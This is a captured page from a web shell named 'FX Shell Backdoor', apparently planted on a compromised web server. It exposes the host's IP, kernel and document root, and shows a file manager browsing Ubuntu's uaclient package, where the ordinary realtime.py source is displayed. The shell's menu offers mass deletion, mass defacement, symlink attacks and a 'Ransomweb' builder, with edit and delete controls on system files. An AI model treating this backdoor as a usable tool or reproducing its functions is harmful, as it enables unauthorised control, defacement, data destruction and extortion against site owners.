FX Shell Backdoor
Home
Tools
Mass Delete
Mass Deface
Symlink
About
Website : vivehg.com
Ip Address : 172.31.2.149
Port : 443
Kernel : Linux 52-72-122-155.cprapid.com 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
Protokol : HTTP/1.1
Save Data :
Koneksi :
Server : Apache
Root : /home/vivehg/public_html
G-Interface : CGI/1.1
R-Method : GET
Browser : Lainnya
Version Shell : 1.0 (Release candidate)
Author : FierzaXploit/Mr.MF33
Type
Name
options
PATH :
/
lib
/
python3
/
dist-packages
/
uaclient
/
entitlements
/
Upload
Buat File
Buat Folder
Buat Ransomweb
from typing import Any, Dict, Optional, Tuple, Type # noqa: F401 from uaclient import apt, event_logger, messages, system, util from uaclient.entitlements import repo from uaclient.entitlements.base import IncompatibleService, UAEntitlement from uaclient.types import ( # noqa: F401 MessagingOperations, MessagingOperationsDict, StaticAffordance, ) event = event_logger.get_event_logger() REALTIME_KERNEL_DOCS_URL = "https://ubuntu.com/realtime-kernel" class RealtimeKernelEntitlement(repo.RepoEntitlement): name = "realtime-kernel" title = "Real-time kernel" description = "Ubuntu kernel with PREEMPT_RT patches integrated" help_doc_url = REALTIME_KERNEL_DOCS_URL repo_key_file = "ubuntu-pro-realtime-kernel.gpg" apt_noninteractive = True supports_access_only = True def _check_for_reboot(self) -> bool: """Check if system needs to be rebooted.""" reboot_required = system.should_reboot( installed_pkgs=set(self.packages), installed_pkgs_regex=set(["linux-.*-realtime"]), ) event.needs_reboot(reboot_required) return reboot_required def _get_variants(self) -> Dict[str, Type[UAEntitlement]]: return { GenericRealtime.variant_name: GenericRealtime, NvidiaTegraRealtime.variant_name: NvidiaTegraRealtime, IntelIotgRealtime.variant_name: IntelIotgRealtime, } @property def incompatible_services(self) -> Tuple[IncompatibleService, ...]: from uaclient.entitlements.fips import ( FIPSEntitlement, FIPSUpdatesEntitlement, ) from uaclient.entitlements.livepatch import LivepatchEntitlement return ( IncompatibleService( FIPSEntitlement, messages.REALTIME_FIPS_INCOMPATIBLE ), IncompatibleService( FIPSUpdatesEntitlement, messages.REALTIME_FIPS_UPDATES_INCOMPATIBLE, ), IncompatibleService( LivepatchEntitlement, messages.REALTIME_LIVEPATCH_INCOMPATIBLE ), ) @property def static_affordances(self) -> Tuple[StaticAffordance, ...]: return ( ( messages.REALTIME_ERROR_INSTALL_ON_CONTAINER, lambda: system.is_container(), False, ), ) @property def messaging( self, ) -> MessagingOperationsDict: pre_enable = None # type: Optional[MessagingOperations] if not self.access_only: pre_enable = [ ( util.prompt_for_confirmation, { "msg": messages.REALTIME_PROMPT, "assume_yes": self.assume_yes, "default": True, }, ) ] return { "pre_enable": pre_enable, "pre_disable": [ ( util.prompt_for_confirmation, { "msg": messages.REALTIME_PRE_DISABLE_PROMPT, "assume_yes": self.assume_yes, }, ) ], } def remove_packages(self) -> None: packages = set(self.packages).intersection( set(apt.get_installed_packages_names()) ) if packages: apt.remove_packages( list(packages), messages.DISABLE_FAILED_TMPL.format(title=self.title), ) class RealtimeVariant(RealtimeKernelEntitlement): @property def incompatible_services(self) -> Tuple[IncompatibleService, ...]: incompatible_variants = tuple( [ IncompatibleService( cls, messages.REALTIME_VARIANT_INCOMPATIBLE.format( service=self.title, variant=cls.title ), ) for name, cls in self.other_variants.items() ] ) return super().incompatible_services + incompatible_variants class GenericRealtime(RealtimeVariant): variant_name = "generic" title = "Real-time kernel" description = "Generic version of the RT kernel (default)" is_variant = True check_packages_are_installed = True class NvidiaTegraRealtime(RealtimeVariant): variant_name = "nvidia-tegra" title = "Real-time NVIDIA Tegra Kernel" description = "RT kernel optimized for NVIDIA Tegra platform" is_variant = True check_packages_are_installed = True class IntelIotgRealtime(RealtimeVariant): variant_name = "intel-iotg" title = "Real-time Intel IOTG Kernel" description = "RT kernel optimized for Intel IOTG platform" is_variant = True check_packages_are_installed = True def verify_platform_checks( self, platform_checks: Dict[str, Any] ) -> Tuple[bool, Optional[messages.NamedMessage]]: vendor_id = system.get_cpu_info().vendor_id cpu_vendor_ids = platform_checks.get("cpu_vendor_ids", []) if vendor_id in cpu_vendor_ids: return True, None else: return False, messages.INAPPLICABLE_VENDOR_NAME.format( title=self.title, vendor=vendor_id, supported_vendors=",".join(cpu_vendor_ids), )
__pycache__
Choose...
Rename
Delete
Now
__init__.py
Choose...
Edit
Rename
Delete
Now
__pycache__
Choose...
Edit
Rename
Delete
Now
anbox.py
Choose...
Edit
Rename
Delete
Now
base.py
Choose...
Edit
Rename
Delete
Now
cc.py
Choose...
Edit
Rename
Delete
Now
cis.py
Choose...
Edit
Rename
Delete
Now
entitlement_status.py
Choose...
Edit
Rename
Delete
Now
esm.py
Choose...
Edit
Rename
Delete
Now
fips.py
Choose...
Edit
Rename
Delete
Now
landscape.py
Choose...
Edit
Rename
Delete
Now
livepatch.py
Choose...
Edit
Rename
Delete
Now
realtime.py
Choose...
Edit
Rename
Delete
Now
repo.py
Choose...
Edit
Rename
Delete
Now
ros.py
Choose...
Edit
Rename
Delete
Now